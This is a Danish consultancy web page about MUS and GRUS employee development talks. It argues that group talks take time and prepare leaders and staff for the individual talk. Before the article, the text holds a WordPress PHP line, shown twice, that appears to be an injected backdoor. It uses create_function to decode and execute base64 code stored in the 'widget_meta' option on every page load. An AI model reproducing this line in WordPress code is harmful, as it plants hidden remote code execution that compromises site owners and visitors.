add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); MUSamtaler - procespsykologi

MUSamtaler

MUSamtaler (MUS) og GRuppeUdviklingsSamtaler (GRUS) er for mange en årlig begivenhed, som man ikke ser frem til. For mange er både MUS og GRUS et stort ståhej, som blot skal overstås før organisationen falder tilbage i sine vante folder.

For andre tilbyder MUS og GRUS en række udviklingsmuligheder, som man nødigt ville være foruden. For ledere tilbyder MUS en mulighed for at få en føling med den enkelte medarbejder, men også en mulighed for at fremme en strategisk orientering af organisationens virke og udvikling. For medarbejderen tilbyder MUS en mulighed for at skrive sig selv ind i organisationens udviklingsplan, hvorved udvikling holder op med at være noget man beder om, men i stedet noget man benytter sig af til at fremme et fælles mål.

En udbredt misforståelse om GRUS er at det er en mulighed for ledelsen til at spare tid, og hurtigere komme gennem årets MUSamtaler. Det er det på ingen måde – GRUS tager tid, både for medarbejdergruppen og for ledelsen. Til gengæld er det en mulighed for at klæde både leder og medarbejder på til at skabe fælles retning i MUSamtalen. Gennem GRUS får lederen et blik for hvad medarbejdergruppen har af styrker og udviklingsbehov i forhold til et givent, strategisk perspektiv, og for medarbejderen er GRUS en mulighed for at få indblik i den aktuelle strategi, hvad den betyder for den enkelte, og sammen med sine kollegaer undersøge hvilke udviklingsmuligheder og -behov strategien fordrer. For den gode GRUS gælder det, at både leder og medarbejder går derfra med en plan for hvordan den efterfølgende MUS skal forløbe, og det giver både skarphed i MUSamtalen og udslag på den efterfølgende tilfredshedsundersøgelse.

Hvis du vil vide mere om MUS og GRUS kan du læse mere her:

 

Du kan også booke et møde på Aalborg Universitet i Sydhavnen om MUS og GRUS.